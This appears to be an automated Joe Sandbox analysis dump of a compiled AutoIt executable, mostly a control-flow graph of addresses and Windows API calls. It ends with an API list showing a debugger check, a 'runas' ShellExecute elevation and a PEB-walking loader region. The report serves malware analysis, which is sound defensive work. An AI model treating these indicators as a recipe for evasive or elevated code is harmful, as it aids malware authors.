101585->103006 103007 6547a0 LoadImageW EnumResourceNamesW 101586->103007 101589 653b34 101591 6539d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101589->101591 101590 68d26a 101591->101437 101593 654375 _memset 101592->101593 103008 654182 101593->103008 101596 6543fa 101604 694cc3 101603->101604 101618 6609f5 101603->101618 103096 6b9e4a 89 API calls 4 library calls 101604->103096 101611 660a4b PeekMessageW 101679 660a05 Mailbox 101611->101679 101615 694e81 Sleep 101615->101679 101617 660ce4 101618->101679 103097 659e5d 60 API calls 101618->103097 103098 6a6349 341 API calls 101618->103098 101622 660ea5 TranslateMessage DispatchMessageW 101623 660e43 PeekMessageW 101622->101623 101623->101679 101624 694d50 TranslateAcceleratorW 101624->101623 101624->101679 101625 660d13 timeGetTime 101625->101679 101626 69581f WaitForSingleObject 101626->101679 101629 660e5f Sleep 101662 660e70 Mailbox 101629->101662 101630 658047 59 API calls 101630->101679 101631 657667 59 API calls 101631->101662 101632 670db6 59 API calls Mailbox 101632->101679 101633 695af8 Sleep 101633->101662 101636 67049f timeGetTime 101636->101662 101637 660f4e timeGetTime 103095 659e5d 60 API calls 101637->103095 101641 695b8f GetExitCodeProcess 101646 6d5f25 110 API calls 101646->101662 101647 65b7dd 109 API calls 101647->101662 101648 659e5d 60 API calls 101648->101679 101649 695874 101663 660f95 101649->101663 101650 695c17 Sleep 101650->101679 101651 695078 Sleep 101651->101679 101653 657de1 59 API calls 101653->101662 101658 659ea0 314 API calls 101658->101679 101662->101631 101662->101636 101662->101641 101662->101646 101662->101647 101662->101649 101662->101650 101662->101651 101662->101653 101662->101663 101662->101679 101663->101444 101665 6b9e4a 89 API calls 101665->101679 101667 659c90 59 API calls Mailbox 101667->101679 101668 6584c0 69 API calls 101668->101679 101669 65b73c 314 API calls 101669->101679 101671 6a617e 59 API calls Mailbox 101671->101679 101672 6955d5 VariantClear 
101672->101679 101673 658cd4 59 API calls Mailbox 101673->101679 101674 69566b VariantClear 101674->101679 101675 695419 VariantClear 101675->101679 101676 6a6e8f 59 API calls 101676->101679 101677 657de1 59 API calls 101677->101679 101678 6589b3 69 API calls 101678->101679 101679->101611 101679->101615 101679->101617 101679->101622 101679->101623 101679->101624 101679->101625 101679->101626 101679->101629 101679->101630 101679->101632 101679->101633 101679->101637 101679->101648 101679->101658 101679->101662 101679->101663 101679->101665 101679->101667 101679->101668 101679->101669 101679->101671 101679->101672 101679->101673 101679->101674 101679->101675 101679->101676 101679->101677 101679->101678 103035 65e420 101679->103035 103042 65e6a0 101679->103042 103073 65f460 101679->103073 103091 65fce0 341 API calls 2 library calls 101679->103091 103092 6531ce IsDialogMessageW GetClassLongW 101679->103092 103099 6d6018 59 API calls 101679->103099 103100 6b9a15 59 API calls Mailbox 101679->103100 103101 6ad4f2 59 API calls 101679->103101 103102 659837 101679->103102 103120 6a60ef 59 API calls 2 library calls 101679->103120 103121 658401 59 API calls 101679->103121 103122 6582df 59 API calls Mailbox 101679->103122 101681->101421 101682->101433 101684 681940 __write_nolock 101683->101684 101685 654713 GetModuleFileNameW 101684->101685 101686 657de1 59 API calls 101685->101686 101687 654739 101686->101687 101688 654750 60 API calls 101687->101688 101689 654743 Mailbox 101688->101689 101689->101440 101711 653d3e __write_nolock 101710->101711 101712 657bcc 59 API calls 101711->101712 101717 653ea4 Mailbox 101711->101717 101714 653d70 101712->101714 101723 653da6 Mailbox 101714->101723 101836 6579f2 101714->101836 101715 653e77 101716 657de1 59 API calls 101715->101716 101715->101717 101719 653e98 101716->101719 101717->101466 101718 657de1 59 API calls 101718->101723 101720 653f74 59 API calls 101719->101720 101720->101717 101721 6579f2 59 API calls 101721->101723 
101723->101715 101723->101717 101723->101718 101723->101721 101839 653f74 101723->101839 101849 654bb5 101724->101849 101729 654e08 LoadLibraryExW 101859 654b6a 101729->101859 101730 68d8e6 101731 654e4a 84 API calls 101730->101731 101733 68d8ed 101731->101733 101735 654b6a 3 API calls 101733->101735 101737 68d8f5 101735->101737 101885 654f0b 101737->101885 101738 654e2f 101738->101737 101739 654e3b 101738->101739 101741 654e4a 84 API calls 101739->101741 101743 6537d4 101741->101743 101743->101473 101743->101474 101745 68d91c 101893 654ec7 101745->101893 101747 68d929 101749 658052 101748->101749 101750 6537ef 101748->101750 102323 657f77 59 API calls 2 library calls 101749->102323 101752 65928a 101750->101752 101753 670db6 Mailbox 59 API calls 101752->101753 101754 6537fb 101753->101754 101754->101487 101756 6584cb 101755->101756 101758 6584f2 101756->101758 102324 6589b3 69 API calls Mailbox 101756->102324 101758->101491 101760 653ef3 101759->101760 101761 653eda 101759->101761 101762 657bcc 59 API calls 101760->101762 101763 658047 59 API calls 101761->101763 101764 653879 101762->101764 101763->101764 101765 672efd 101764->101765 101766 672f7e 101765->101766 101767 672f09 101765->101767 102327 672f90 60 API calls 3 library calls 101766->102327 101774 672f2e 101767->101774 102325 678b28 58 API calls __getptd_noexit 101767->102325 101770 672f8b 101770->101512 101771 672f15 102326 678db6 9 API calls _wprintf 101771->102326 101773 672f20 101773->101512 101774->101512 101776 6592d6 101775->101776 101777 670db6 Mailbox 59 API calls 101776->101777 101778 6592e4 101777->101778 101779 653924 101778->101779 102328 6591fc 59 API calls Mailbox 101778->102328 101781 659050 101779->101781 102329 659160 101781->102329 101783 65905f 101784 670db6 Mailbox 59 API calls 101783->101784 101785 653932 101783->101785 101784->101785 101786 658ee0 101785->101786 101787 68f17c 101786->101787 101789 658ef7 101786->101789 101787->101789 102339 658bdb 59 API calls Mailbox 101787->102339 
101790 659040 101789->101790 101791 658ff8 101789->101791 101794 658fff 101789->101794 102338 659d3c 60 API calls Mailbox 101790->102338 101793 670db6 Mailbox 59 API calls 101791->101793 101793->101794 101794->101540 101796 654ee5 85 API calls 101795->101796 101797 6b95ca 101796->101797 102340 6b9734 101797->102340 101800 654f0b 74 API calls 101801 6b95f7 101800->101801 101802 654f0b 74 API calls 101801->101802 101803 6b9607 101802->101803 101804 654f0b 74 API calls 101803->101804 101805 6b9622 101804->101805 101806 654f0b 74 API calls 101805->101806 101807 6b963d 101806->101807 101808 654ee5 85 API calls 101807->101808 101809 6b9654 101808->101809 101810 67571c __malloc_crt 58 API calls 101809->101810 101811 6b965b 101810->101811 101812 67571c __malloc_crt 58 API calls 101811->101812 101813 6b9665 101812->101813 101814 654f0b 74 API calls 101813->101814 101815 6b9679 101814->101815 101816 6b9109 GetSystemTimeAsFileTime 101815->101816 101817 6b968c 101816->101817 101818 6b96a1 101817->101818 101819 6b96b6 101817->101819 101820 672d55 _free 58 API calls 101818->101820 101821 6b971b 101819->101821 101822 6b96bc 101819->101822 101824 6b96a7 101820->101824 101823 672d55 _free 58 API calls 101821->101823 102346 6b8b06 101822->102346 101828 68d186 101823->101828 101826 672d55 _free 58 API calls 101824->101826 101826->101828 101828->101477 101830 654e4a 101828->101830 101829 672d55 _free 58 API calls 101829->101828 101831 654e54 101830->101831 101833 654e5b 101830->101833 101832 6753a6 __fcloseall 83 API calls 101831->101832 101832->101833 101834 654e7b FreeLibrary 101833->101834 101835 654e6a 101833->101835 101834->101835 101835->101477 101845 657e4f 101836->101845 101838 6579fd 101838->101714 101840 653f82 101839->101840 101844 653fa4 _memmove 101839->101844 101842 670db6 Mailbox 59 API calls 101840->101842 101841 670db6 Mailbox 59 API calls 101843 653fb8 101841->101843 101842->101844 101843->101723 101844->101841 101846 657e62 101845->101846 101848 657e5f _memmove 
101845->101848 101847 670db6 Mailbox 59 API calls 101846->101847 101847->101848 101848->101838 101898 654c03 101849->101898 101852 654c03 2 API calls 101855 654bdc 101852->101855 101853 654bf5 101856 67525b 101853->101856 101854 654bec FreeLibrary 101854->101853 101855->101853 101855->101854 101902 675270 101856->101902 101858 654dfc 101858->101729 101858->101730 102060 654c36 101859->102060 101862 654b8f 101864 654ba1 FreeLibrary 101862->101864 101865 654baa 101862->101865 101863 654c36 2 API calls 101863->101862 101864->101865 101866 654c70 101865->101866 101867 670db6 Mailbox 59 API calls 101866->101867 101868 654c85 101867->101868 102064 65522e 101868->102064 101870 654c91 _memmove 101871 654ccc 101870->101871 101872 654dc1 101870->101872 101873 654d89 101870->101873 101874 654ec7 69 API calls 101871->101874 102078 6b991b 95 API calls 101872->102078 102067 654e89 CreateStreamOnHGlobal 101873->102067 101878 654cd5 101874->101878 101877 654f0b 74 API calls 101877->101878 101878->101877 101879 654d69 101878->101879 101881 68d8a7 101878->101881 102073 654ee5 101878->102073 101879->101738 101882 654ee5 85 API calls 101881->101882 101883 68d8bb 101882->101883 101884 654f0b 74 API calls 101883->101884 101884->101879 101886 654f1d 101885->101886 101889 68d9cd 101885->101889 102102 6755e2 101886->102102 101890 6b9109 102300 6b8f5f 101890->102300 101892 6b911f 101892->101745 101894 654ed6 101893->101894 101895 68d990 101893->101895 102305 675c60 101894->102305 101897 654ede 101897->101747 101899 654bd0 101898->101899 101900 654c0c LoadLibraryA 101898->101900 101899->101852 101899->101855 101900->101899 101901 654c1d GetProcAddress 101900->101901 101901->101899 101904 67527c _wprintf 101902->101904 101903 67528f 101951 678b28 58 API calls __getptd_noexit 101903->101951 101904->101903 101906 6752c0 101904->101906 101921 6804e8 101906->101921 101907 675294 101952 678db6 9 API calls _wprintf 101907->101952 101910 6752c5 101911 6752ce 101910->101911 101912 6752db 
101910->101912 101953 678b28 58 API calls __getptd_noexit 101911->101953 101914 675305 101912->101914 101915 6752e5 101912->101915 101936 680607 101914->101936 101954 678b28 58 API calls __getptd_noexit 101915->101954 101917 67529f _wprintf @_EH4_CallFilterFunc@8 101917->101858 101922 6804f4 _wprintf 101921->101922 101923 679c0b __lock 58 API calls 101922->101923 101934 680502 101923->101934 101924 680576 101956 6805fe 101924->101956 101925 68057d 101961 67881d 58 API calls __malloc_crt 101925->101961 101928 680584 101928->101924 101962 679e2b InitializeCriticalSectionAndSpinCount 101928->101962 101929 6805f3 _wprintf 101929->101910 101931 679c93 __mtinitlocknum 58 API calls 101931->101934 101933 6805aa EnterCriticalSection 101933->101924 101934->101924 101934->101925 101934->101931 101959 676c50 59 API calls __lock 101934->101959 101960 676cba LeaveCriticalSection LeaveCriticalSection _doexit 101934->101960 101945 680627 __wopenfile 101936->101945 101937 680641 101967 678b28 58 API calls __getptd_noexit 101937->101967 101939 6807fc 101939->101937 101943 68085f 101939->101943 101940 680646 101968 678db6 9 API calls _wprintf 101940->101968 101942 675310 101955 675332 LeaveCriticalSection LeaveCriticalSection _fseek 101942->101955 101964 6885a1 101943->101964 101945->101937 101945->101939 101945->101945 101969 6737cb 60 API calls 2 library calls 101945->101969 101947 6807f5 101947->101939 101970 6737cb 60 API calls 2 library calls 101947->101970 101949 680814 101949->101939 101971 6737cb 60 API calls 2 library calls 101949->101971 101951->101907 101952->101917 101953->101917 101954->101917 101955->101917 101963 679d75 LeaveCriticalSection 101956->101963 101958 680605 101958->101929 101959->101934 101960->101934 101961->101928 101962->101933 101963->101958 101972 687d85 101964->101972 101966 6885ba 101966->101942 101967->101940 101968->101942 101969->101947 101970->101949 101971->101939 101973 687d91 _wprintf 101972->101973 101974 687da7 101973->101974 101977 687ddd 
101973->101977 102057 678b28 58 API calls __getptd_noexit 101974->102057 101976 687dac 102058 678db6 9 API calls _wprintf 101976->102058 101983 687e4e 101977->101983 101980 687df9 102059 687e22 LeaveCriticalSection __unlock_fhandle 101980->102059 101982 687db6 _wprintf 101982->101966 101984 687e6e 101983->101984 101985 6744ea __wsopen_nolock 58 API calls 101984->101985 101989 687e8a 101985->101989 101986 678dc6 __invoke_watson 8 API calls 101987 6885a0 101986->101987 101991 687d85 __wsopen_helper 103 API calls 101987->101991 101988 687ee7 101997 687fa5 101988->101997 102005 687f83 101988->102005 101989->101988 101990 687ec4 101989->101990 102006 687fc1 101989->102006 101992 678af4 __dosmaperr 58 API calls 101990->101992 101993 6885ba 101991->101993 101994 687ec9 101992->101994 101993->101980 101995 678b28 _wprintf 58 API calls 101994->101995 101996 687ed6 101995->101996 101998 678db6 _wprintf 9 API calls 101996->101998 101999 678af4 __dosmaperr 58 API calls 101997->101999 102000 687ee0 101998->102000 102001 687faa 101999->102001 102000->101980 102002 678b28 _wprintf 58 API calls 102001->102002 102003 687fb7 102002->102003 102004 678db6 _wprintf 9 API calls 102003->102004 102004->102006 102007 67d294 __alloc_osfhnd 61 API calls 102005->102007 102006->101986 102008 688051 102007->102008 102009 68805b 102008->102009 102010 68807e 102008->102010 102011 678af4 __dosmaperr 58 API calls 102009->102011 102012 687cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102010->102012 102013 688060 102011->102013 102023 6880a0 102012->102023 102014 678b28 _wprintf 58 API calls 102013->102014 102016 68806a 102014->102016 102015 68811e GetFileType 102017 688129 GetLastError 102015->102017 102018 68816b 102015->102018 102021 678b28 _wprintf 58 API calls 102016->102021 102022 678b07 __dosmaperr 58 API calls 102017->102022 102027 67d52a __set_osfhnd 59 API calls 102018->102027 102019 6880ec GetLastError 102020 678b07 __dosmaperr 58 API calls 102019->102020 102024 688111 
102020->102024 102021->102000 102025 688150 CloseHandle 102022->102025 102023->102015 102023->102019 102026 687cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102023->102026 102030 678b28 _wprintf 58 API calls 102024->102030 102025->102024 102028 68815e 102025->102028 102029 6880e1 102026->102029 102034 688189 102027->102034 102031 678b28 _wprintf 58 API calls 102028->102031 102029->102015 102029->102019 102030->102006 102032 688163 102031->102032 102032->102024 102033 688344 102033->102006 102036 688517 CloseHandle 102033->102036 102034->102033 102035 6818c1 __lseeki64_nolock 60 API calls 102034->102035 102051 68820a 102034->102051 102037 6881f3 102035->102037 102038 687cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102036->102038 102041 678af4 __dosmaperr 58 API calls 102037->102041 102037->102051 102040 68853e 102038->102040 102039 680e5b 70 API calls __read_nolock 102039->102051 102042 688572 102040->102042 102043 688546 GetLastError 102040->102043 102041->102051 102042->102006 102044 678b07 __dosmaperr 58 API calls 102043->102044 102046 688552 102044->102046 102045 68823c 102048 6897a2 __chsize_nolock 82 API calls 102045->102048 102045->102051 102049 67d43d __free_osfhnd 59 API calls 102046->102049 102047 680add __close_nolock 61 API calls 102047->102051 102048->102045 102049->102042 102050 67d886 __write 78 API calls 102050->102051 102051->102033 102051->102039 102051->102045 102051->102047 102051->102050 102052 6883c1 102051->102052 102055 6818c1 60 API calls __lseeki64_nolock 102051->102055 102053 680add __close_nolock 61 API calls 102052->102053 102054 6883c8 102053->102054 102056 678b28 _wprintf 58 API calls 102054->102056 102055->102051 102056->102006 102057->101976 102058->101982 102059->101982 102061 654b83 102060->102061 102062 654c3f LoadLibraryA 102060->102062 102061->101862 102061->101863 102062->102061 102063 654c50 GetProcAddress 102062->102063 102063->102061 102065 670db6 Mailbox 59 API calls 102064->102065 102066 
655240 102065->102066 102066->101870 102068 654ea3 FindResourceExW 102067->102068 102072 654ec0 102067->102072 102069 68d933 LoadResource 102068->102069 102068->102072 102070 68d948 SizeofResource 102069->102070 102069->102072 102071 68d95c LockResource 102070->102071 102070->102072 102071->102072 102072->101871 102074 654ef4 102073->102074 102075 68d9ab 102073->102075 102079 67584d 102074->102079 102077 654f02 102077->101878 102078->101871 102080 675859 _wprintf 102079->102080 102081 67586b 102080->102081 102083 675891 102080->102083 102092 678b28 58 API calls __getptd_noexit 102081->102092 102094 676c11 102083->102094 102084 675870 102093 678db6 9 API calls _wprintf 102084->102093 102087 675897 102100 6757be 83 API calls 5 library calls 102087->102100 102089 6758a6 102101 6758c8 LeaveCriticalSection LeaveCriticalSection _fseek 102089->102101 102091 67587b _wprintf 102091->102077 102092->102084 102093->102091 102095 676c43 EnterCriticalSection 102094->102095 102096 676c21 102094->102096 102098 676c39 102095->102098 102096->102095 102097 676c29 102096->102097 102099 679c0b __lock 58 API calls 102097->102099 102098->102087 102099->102098 102100->102089 102101->102091 102105 6755fd 102102->102105 102104 654f2e 102104->101890 102106 675609 _wprintf 102105->102106 102107 67564c 102106->102107 102108 675644 _wprintf 102106->102108 102110 67561f _memset 102106->102110 102109 676c11 __lock_file 59 API calls 102107->102109 102108->102104 102112 675652 102109->102112 102132 678b28 58 API calls __getptd_noexit 102110->102132 102118 67541d 102112->102118 102113 675639 102133 678db6 9 API calls _wprintf 102113->102133 102119 675453 102118->102119 102122 675438 _memset 102118->102122 102134 675686 LeaveCriticalSection LeaveCriticalSection _fseek 102119->102134 102120 675443 102230 678b28 58 API calls __getptd_noexit 102120->102230 102122->102119 102122->102120 102124 675493 102122->102124 102124->102119 102126 6755a4 _memset 102124->102126 102135 6746e6 102124->102135 102142 
680e5b 102124->102142 102210 680ba7 102124->102210 102232 680cc8 58 API calls 3 library calls 102124->102232 102233 678b28 58 API calls __getptd_noexit 102126->102233 102131 675448 102231 678db6 9 API calls _wprintf 102131->102231 102132->102113 102133->102108 102134->102108 102136 674705 102135->102136 102137 6746f0 102135->102137 102136->102124 102234 678b28 58 API calls __getptd_noexit 102137->102234 102139 6746f5 102235 678db6 9 API calls _wprintf 102139->102235 102141 674700 102141->102124 102143 680e7c 102142->102143 102144 680e93 102142->102144 102245 678af4 58 API calls __getptd_noexit 102143->102245 102145 6815cb 102144->102145 102150 680ecd 102144->102150 102261 678af4 58 API calls __getptd_noexit 102145->102261 102148 680e81 102246 678b28 58 API calls __getptd_noexit 102148->102246 102152 680ed5 102150->102152 102159 680eec 102150->102159 102151 6815d0 102262 678b28 58 API calls __getptd_noexit 102151->102262 102247 678af4 58 API calls __getptd_noexit 102152->102247 102155 680ee1 102263 678db6 9 API calls _wprintf 102155->102263 102156 680e88 102156->102124 102157 680eda 102248 678b28 58 API calls __getptd_noexit 102157->102248 102159->102156 102160 680f01 102159->102160 102162 680f1b 102159->102162 102165 680f39 102159->102165 102249 678af4 58 API calls __getptd_noexit 102160->102249 102162->102160 102164 680f26 102162->102164 102236 685c6b 102164->102236 102250 67881d 58 API calls __malloc_crt 102165->102250 102168 680f49 102170 680f6c 102168->102170 102171 680f51 102168->102171 102169 68103a 102172 6810b3 ReadFile 102169->102172 102175 681050 GetConsoleMode 102169->102175 102253 6818c1 60 API calls 3 library calls 102170->102253 102251 678b28 58 API calls __getptd_noexit 102171->102251 102176 681593 GetLastError 102172->102176 102177 6810d5 102172->102177 102181 6810b0 102175->102181 102182 681064 102175->102182 102179 6815a0 102176->102179 102186 681093 102176->102186 102177->102176 102184 6810a5 102177->102184 102178 680f56 102252 678af4 58 API 
calls __getptd_noexit 102178->102252 102259 678b28 58 API calls __getptd_noexit 102179->102259 102181->102172 102182->102181 102185 68106a ReadConsoleW 102182->102185 102192 681099 102184->102192 102194 68110a 102184->102194 102197 681377 102184->102197 102185->102184 102188 68108d GetLastError 102185->102188 102186->102192 102254 678b07 58 API calls 2 library calls 102186->102254 102187 6815a5 102260 678af4 58 API calls __getptd_noexit 102187->102260 102188->102186 102191 672d55 _free 58 API calls 102191->102156 102192->102156 102192->102191 102195 681176 ReadFile 102194->102195 102203 6811f7 102194->102203 102198 681197 GetLastError 102195->102198 102208 6811a1 102195->102208 102196 68147d ReadFile 102202 6814a0 GetLastError 102196->102202 102209 6814ae 102196->102209 102197->102192 102197->102196 102198->102208 102199 6812b4 102204 681264 MultiByteToWideChar 102199->102204 102257 6818c1 60 API calls 3 library calls 102199->102257 102200 6812a4 102256 678b28 58 API calls __getptd_noexit 102200->102256 102202->102209 102203->102192 102203->102199 102203->102200 102203->102204 102204->102188 102204->102192 102208->102194 102255 6818c1 60 API calls 3 library calls 102208->102255 102209->102197 102258 6818c1 60 API calls 3 library calls 102209->102258 102211 680bb2 102210->102211 102215 680bc7 102210->102215 102297 678b28 58 API calls __getptd_noexit 102211->102297 102213 680bb7 102298 678db6 9 API calls _wprintf 102213->102298 102216 680bfc 102215->102216 102223 680bc2 102215->102223 102299 685fe4 58 API calls __malloc_crt 102215->102299 102218 6746e6 __fclose_nolock 58 API calls 102216->102218 102219 680c10 102218->102219 102264 680d47 102219->102264 102221 680c17 102222 6746e6 __fclose_nolock 58 API calls 102221->102222 102221->102223 102224 680c3a 102222->102224 102223->102124 102224->102223 102225 6746e6 __fclose_nolock 58 API calls 102224->102225 102226 680c46 102225->102226 102226->102223 102227 6746e6 __fclose_nolock 58 API calls 102226->102227 102228 680c53 
102227->102228 102229 6746e6 __fclose_nolock 58 API calls 102228->102229 102229->102223 102230->102131 102231->102119 102232->102124 102233->102131 102234->102139 102235->102141 102237 685c76 102236->102237 102239 685c83 102236->102239 102238 678b28 _wprintf 58 API calls 102237->102238 102240 685c7b 102238->102240 102241 685c8f 102239->102241 102242 678b28 _wprintf 58 API calls 102239->102242 102240->102169 102241->102169 102243 685cb0 102242->102243 102244 678db6 _wprintf 9 API calls 102243->102244 102244->102240 102245->102148 102246->102156 102247->102157 102248->102155 102249->102157 102250->102168 102251->102178 102252->102156 102253->102164 102254->102192 102255->102208 102256->102192 102257->102204 102258->102209 102259->102187 102260->102192 102261->102151 102262->102155 102263->102156 102265 680d53 _wprintf 102264->102265 102266 680d60 102265->102266 102267 680d77 102265->102267 102269 678af4 __dosmaperr 58 API calls 102266->102269 102268 680e3b 102267->102268 102270 680d8b 102267->102270 102271 678af4 __dosmaperr 58 API calls 102268->102271 102272 680d65 102269->102272 102273 680da9 102270->102273 102274 680db6 102270->102274 102279 680dae 102271->102279 102275 678b28 _wprintf 58 API calls 102272->102275 102276 678af4 __dosmaperr 58 API calls 102273->102276 102277 680dd8 102274->102277 102278 680dc3 102274->102278 102286 680d6c _wprintf 102275->102286 102276->102279 102281 67d206 ___lock_fhandle 59 API calls 102277->102281 102280 678af4 __dosmaperr 58 API calls 102278->102280 102282 678b28 _wprintf 58 API calls 102279->102282 102283 680dc8 102280->102283 102284 680dde 102281->102284 102285 680dd0 102282->102285 102287 678b28 _wprintf 58 API calls 102283->102287 102288 680df1 102284->102288 102289 680e04 102284->102289 102291 678db6 _wprintf 9 API calls 102285->102291 102286->102221 102287->102285 102290 680e5b __read_nolock 70 API calls 102288->102290 102292 678b28 _wprintf 58 API calls 102289->102292 102293 680dfd 102290->102293 102291->102286 102294 
68d074 103986->103997 104016 65443a Shell_NotifyIconW _memset 103987->104016 103988 68d0f3 104021 661093 341 API calls Mailbox 103988->104021 103989->104013 104018 6544a0 64 API calls _memset 103990->104018 103992 68d139 103991->103992 103993 6536b3 103991->103993 103992->103975 104024 6a7c36 59 API calls Mailbox 103992->104024 104000 6536be 103993->104000 104001 68d124 103993->104001 103994 68d166 103994->103975 103994->104013 103996->104013 104003 68d078 103997->104003 104004 68d097 SetFocus 103997->104004 104000->103975 104022 65443a Shell_NotifyIconW _memset 104000->104022 104023 6b2d36 81 API calls _memset 104001->104023 104002 653764 104002->104013 104003->104000 104006 68d081 104003->104006 104004->104013 104005 65370c 104017 653114 DeleteObject DestroyWindow Mailbox 104005->104017 104019 661070 10 API calls Mailbox 104006->104019 104011->103975 104014 68d118 104015 65434a 68 API calls 104014->104015 104015->104011 104016->104005 104017->104013 104018->104002 104019->104013 104020->103988 104021->104000 104022->104014 104023->104002 104024->104011 104025->103994 104026 65107d 104031 65708b 104026->104031 104028 65108c 104029 672d40 __cinit 67 API calls 104028->104029 104030 651096 104029->104030 104032 65709b __write_nolock 104031->104032 104033 657667 59 API calls 104032->104033 104034 657151 104033->104034 104035 654706 61 API calls 104034->104035 104036 65715a 104035->104036 104062 67050b 104036->104062 104039 657cab 59 API calls 104040 657173 104039->104040 104041 653f74 59 API calls 104040->104041 104042 657182 104041->104042 104043 657667 59 API calls 104042->104043 104044 65718b 104043->104044 104045 657d8c 59 API calls 104044->104045 104046 657194 RegOpenKeyExW 104045->104046 104047 68e8b1 RegQueryValueExW 104046->104047 104051 6571b6 Mailbox 104046->104051 104048 68e8ce 104047->104048 104049 68e943 RegCloseKey 104047->104049 104050 670db6 Mailbox 59 API calls 104048->104050 104049->104051 104061 68e955 _wcscat Mailbox __wsetenvp 104049->104061 
104052 68e8e7 104050->104052 104051->104028 104054 65522e 59 API calls 104052->104054 104053 6579f2 59 API calls 104053->104061 104055 68e8f2 RegQueryValueExW 104054->104055 104056 68e90f 104055->104056 104058 68e929 104055->104058 104057 657bcc 59 API calls 104056->104057 104057->104058 104058->104049 104059 657de1 59 API calls 104059->104061 104060 653f74 59 API calls 104060->104061 104061->104051 104061->104053 104061->104059 104061->104060 104063 681940 __write_nolock 104062->104063 104064 670518 GetFullPathNameW 104063->104064 104065 67053a 104064->104065 104066 657bcc 59 API calls 104065->104066 104067 657165 104066->104067 104067->104039 104068 32d23b0 104082 32d0000 104068->104082 104070 32d2432 104085 32d22a0 104070->104085 104088 32d3460 GetPEB 104082->104088 104084 32d068b 104084->104070 104086 32d22a9 Sleep 104085->104086 104087 32d22b7 104086->104087 104089 32d348a 104088->104089 104089->104084 104090 65e5ab 104093 65d100 104090->104093 104092 65e5b9 104094 65d11d 104093->104094 104111 65d37d 104093->104111 104095 692691 104094->104095 104096 6926e0 104094->104096 104117 65d144 104094->104117 104097 692694 104095->104097 104106 6926af 104095->104106 104137 6ca3e6 341 API calls __cinit 104096->104137 104100 6926a0 104097->104100 104097->104117 104135 6ca9fa 341 API calls 104100->104135 104103 672d40 __cinit 67 API calls 104103->104117 104104 6928b5 104104->104104 104105 65d54b 104105->104092 104106->104111 104136 6caea2 341 API calls 3 library calls 104106->104136 104107 65d434 104129 658a52 68 API calls 104107->104129 104111->104105 104142 6b9e4a 89 API calls 4 library calls 104111->104142 104112 6927fc 104141 6ca751 89 API calls 104112->104141 104113 65d443 104113->104092 104116 6584c0 69 API calls 104116->104117 104117->104103 104117->104105 104117->104107 104117->104111 104117->104112 104117->104116 104124 659ea0 341 API calls 104117->104124 104125 658047 59 API calls 104117->104125 104127 658740 68 API calls __cinit 104117->104127 104128 658542 68 
API calls 104117->104128 104130 65843a 68 API calls 104117->104130 104131 65cf7c 341 API calls 104117->104131 104132 659dda 59 API calls Mailbox 104117->104132 104133 65cf00 89 API calls 104117->104133 104134 65cd7d 341 API calls 104117->104134 104138 658a52 68 API calls 104117->104138 104139 659d3c 60 API calls Mailbox 104117->104139 104140 6a678d 60 API calls 104117->104140 104124->104117 104125->104117 104127->104117 104128->104117 104129->104113 104130->104117 104131->104117 104132->104117 104133->104117 104134->104117 104135->104105 104136->104111 104137->104117 104138->104117 104139->104117 104140->104117 104141->104111 104142->104104 104143 65552a 104144 655ab8 59 API calls 104143->104144 104145 65553c 104144->104145 104146 6554d2 61 API calls 104145->104146 104147 65554a 104146->104147 104149 65555a Mailbox 104147->104149 104150 658061 61 API calls Mailbox 104147->104150 104150->104149

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00653B68
                                                    • IsDebuggerPresent.KERNEL32 ref: 00653B7A
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,007152F8,007152E0,?,?), ref: 00653BEB
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                      • Part of subcall function 0066092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00653C14,007152F8,?,?,?), ref: 0066096E
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00653C6F
                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00707770,00000010), ref: 0068D281
                                                    • SetCurrentDirectoryW.KERNEL32(?,007152F8,?,?,?), ref: 0068D2B9
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00704260,007152F8,?,?,?), ref: 0068D33F
                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0068D346
                                                      • Part of subcall function 00653A46: GetSysColorBrush.USER32(0000000F), ref: 00653A50
                                                      • Part of subcall function 00653A46: LoadCursorW.USER32(00000000,00007F00), ref: 00653A5F
                                                      • Part of subcall function 00653A46: LoadIconW.USER32(00000063), ref: 00653A76
                                                      • Part of subcall function 00653A46: LoadIconW.USER32(000000A4), ref: 00653A88
                                                      • Part of subcall function 00653A46: LoadIconW.USER32(000000A2), ref: 00653A9A
                                                      • Part of subcall function 00653A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00653AC0
                                                      • Part of subcall function 00653A46: RegisterClassExW.USER32(?), ref: 00653B16
                                                      • Part of subcall function 006539D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00653A03
                                                      • Part of subcall function 006539D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00653A24
                                                      • Part of subcall function 006539D5: ShowWindow.USER32(00000000,?,?), ref: 00653A38
                                                      • Part of subcall function 006539D5: ShowWindow.USER32(00000000,?,?), ref: 00653A41
                                                      • Part of subcall function 0065434A: _memset.LIBCMT ref: 00654370
                                                      • Part of subcall function 0065434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00654415
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
